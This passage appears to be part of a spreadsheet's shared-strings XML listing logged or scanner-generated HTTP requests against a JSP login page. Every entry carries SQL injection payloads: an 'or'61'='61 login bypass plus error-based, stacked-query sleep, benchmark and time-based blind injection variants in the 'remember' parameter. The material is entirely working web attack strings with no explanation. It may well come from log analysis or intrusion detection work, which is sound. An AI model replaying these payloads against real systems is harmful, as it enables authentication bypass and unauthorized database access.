    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9168')))or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(1463=1463)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--and((('qbla'='qbla&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7015&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3828'or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(1463=1463)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--and'dapk'='dapk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3603&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5923')or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(1463=1463)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--and('vqnf'like'vqnf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4534&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3030'))or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(1463=1463)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--and(('kbcv'like'kbcv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2110&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8237')))or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(1463=1463)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--and((('tkid'like'tkid&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-130&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6908'or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(1463=1463)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--and'nfxs'like'nfxs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8035&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7983")or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(1463=1463)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--and("ivdh"="ivdh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-187&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3085"))or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(1463=1463)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--and(("dvzx"="dvzx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8488&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1538")))or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(1463=1463)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--and((("gria"="gria&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7139&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7348"or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(1463=1463)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--and"jpps"="jpps&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3868&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6725")or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(1463=1463)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--and("uqhd"like"uqhd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7011&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5350"))or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(1463=1463)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--and(("waqr"like"waqr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-694&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-586")))or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(1463=1463)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--and((("fgpa"like"fgpa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5379&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4687"or1groupbyconcat(char(58,114,116,109,58),(select(casewhen(1463=1463)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))havingmin(0)--and"lenk"like"lenk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=(select5569from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(5569=5569)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=,(select7137from(selectcount(*),concat(char(58,114,116,109,58),(select(casewhen(7137=7137)then1else0end)),char(58,101,107,121,58),floor(rand(0)*2))xfrominformation_schema.character_setsgroupbyx)a)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=);selectsleep(5);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');selectsleep(5);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';selectsleep(5);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";selectsleep(5);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=);selectsleep(5);--and(7001=7001&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=));selectsleep(5);--and((2439=2439&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)));selectsleep(5);--and(((638=638&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=;selectsleep(5);--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');selectsleep(5);--and('dkyw'='dkyw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='));selectsleep(5);--and(('tdaw'='tdaw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')));selectsleep(5);--and((('adlv'='adlv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';selectsleep(5);--and'awby'='awby&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');selectsleep(5);--and('wbjh'like'wbjh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='));selectsleep(5);--and(('irbj'like'irbj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')));selectsleep(5);--and((('olpq'like'olpq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';selectsleep(5);--and'iwzp'like'iwzp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=");selectsleep(5);--and("ndwr"="ndwr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="));selectsleep(5);--and(("jyov"="jyov&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")));selectsleep(5);--and((("kepk"="kepk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";selectsleep(5);--and"dxdt"="dxdt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=");selectsleep(5);--and("afis"like"afis&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="));selectsleep(5);--and(("weia"like"weia&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")));selectsleep(5);--and((("gnrr"like"gnrr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";selectsleep(5);--and"mnnq"like"mnnq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=);selectbenchmark(5000000,md5(char(65,117,81,67)));--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');selectbenchmark(5000000,md5(char(65,117,81,67)));--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';selectbenchmark(5000000,md5(char(65,117,81,67)));--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";selectbenchmark(5000000,md5(char(65,117,81,67)));--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=);selectbenchmark(5000000,md5(char(65,117,81,67)));--and(981=981&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=));selectbenchmark(5000000,md5(char(65,117,81,67)));--and((8667=8667&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)));selectbenchmark(5000000,md5(char(65,117,81,67)));--and(((7433=7433&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=;selectbenchmark(5000000,md5(char(65,117,81,67)));--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');selectbenchmark(5000000,md5(char(65,117,81,67)));--and('qwqx'='qwqx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='));selectbenchmark(5000000,md5(char(65,117,81,67)));--and(('vmgb'='vmgb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')));selectbenchmark(5000000,md5(char(65,117,81,67)));--and((('eotw'='eotw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';selectbenchmark(5000000,md5(char(65,117,81,67)));--and'zead'='zead&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=');selectbenchmark(5000000,md5(char(65,117,81,67)));--and('otwg'like'otwg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='));selectbenchmark(5000000,md5(char(65,117,81,67)));--and(('fgbb'like'fgbb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')));selectbenchmark(5000000,md5(char(65,117,81,67)));--and((('fgug'like'fgug&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=';selectbenchmark(5000000,md5(char(65,117,81,67)));--and'yimn'like'yimn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=");selectbenchmark(5000000,md5(char(65,117,81,67)));--and("fygt"="fygt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="));selectbenchmark(5000000,md5(char(65,117,81,67)));--and(("widv"="widv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")));selectbenchmark(5000000,md5(char(65,117,81,67)));--and((("omtw"="omtw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";selectbenchmark(5000000,md5(char(65,117,81,67)));--and"hjyg"="hjyg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=");selectbenchmark(5000000,md5(char(65,117,81,67)));--and("oxrk"like"oxrk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="));selectbenchmark(5000000,md5(char(65,117,81,67)));--and(("wyyl"like"wyyl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")));selectbenchmark(5000000,md5(char(65,117,81,67)));--and((("humr"like"humr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=";selectbenchmark(5000000,md5(char(65,117,81,67)));--and"hxbt"like"hxbt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)andsleep(5)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')andsleep(5)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='andsleep(5)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="andsleep(5)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)andsleep(5)and(3440=3440&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))andsleep(5)and((5582=5582&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))andsleep(5)and(((4280=4280&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=andsleep(5)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')andsleep(5)and('scek'='scek&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))andsleep(5)and(('gxyi'='gxyi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))andsleep(5)and((('vcbh'='vcbh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='andsleep(5)and'dvzo'='dvzo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')andsleep(5)and('wilb'like'wilb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))andsleep(5)and(('buys'like'buys&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))andsleep(5)and((('punm'like'punm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='andsleep(5)and'ciis'like'ciis&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")andsleep(5)and("mbyj"="mbyj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))andsleep(5)and(("akus"="akus&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))andsleep(5)and((("gnpn"="gnpn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="andsleep(5)and"eaiv"="eaiv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")andsleep(5)and("qegv"like"qegv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))andsleep(5)and(("vjkw"like"vjkw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))andsleep(5)and((("zqte"like"zqte&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="andsleep(5)and"liax"like"liax&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)andsleep(5)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')andsleep(5)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='andsleep(5)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="andsleep(5)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)andsleep(5)--and(3454=3454&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))andsleep(5)--and((1474=1474&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))andsleep(5)--and(((1350=1350&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=andsleep(5)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')andsleep(5)--and('umva'='umva&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))andsleep(5)--and(('quaw'='quaw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))andsleep(5)--and((('upjb'='upjb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='andsleep(5)--and'pcvx'='pcvx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')andsleep(5)--and('xygz'like'xygz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))andsleep(5)--and(('lvao'like'lvao&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))andsleep(5)--and((('mmum'like'mmum&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='andsleep(5)--and'zkum'like'zkum&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")andsleep(5)--and("hfmj"="hfmj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))andsleep(5)--and(("bbsa"="bbsa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))andsleep(5)--and((("httv"="httv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="andsleep(5)--and"rwnm"="rwnm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")andsleep(5)--and("bxuk"like"bxuk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))andsleep(5)--and(("kvfv"like"kvfv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))andsleep(5)--and((("fpdh"like"fpdh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="andsleep(5)--and"znkp"like"znkp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and3562=benchmark(5000000,md5(char(118,107,68,78)))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and3562=benchmark(5000000,md5(char(118,107,68,78)))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and3562=benchmark(5000000,md5(char(118,107,68,78)))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and3562=benchmark(5000000,md5(char(118,107,68,78)))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and3562=benchmark(5000000,md5(char(118,107,68,78)))and(5603=5603&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))and3562=benchmark(5000000,md5(char(118,107,68,78)))and((9546=9546&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))and3562=benchmark(5000000,md5(char(118,107,68,78)))and(((3099=3099&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=and3562=benchmark(5000000,md5(char(118,107,68,78)))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and3562=benchmark(5000000,md5(char(118,107,68,78)))and('mocw'='mocw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and3562=benchmark(5000000,md5(char(118,107,68,78)))and(('hyoc'='hyoc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and3562=benchmark(5000000,md5(char(118,107,68,78)))and((('ttys'='ttys&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and3562=benchmark(5000000,md5(char(118,107,68,78)))and'riti'='riti&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and3562=benchmark(5000000,md5(char(118,107,68,78)))and('usli'like'usli&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and3562=benchmark(5000000,md5(char(118,107,68,78)))and(('tmpo'like'tmpo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and3562=benchmark(5000000,md5(char(118,107,68,78)))and((('uksm'like'uksm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and3562=benchmark(5000000,md5(char(118,107,68,78)))and'qmme'like'qmme&amp;modo=entrar</t>
  </si>
  <si>
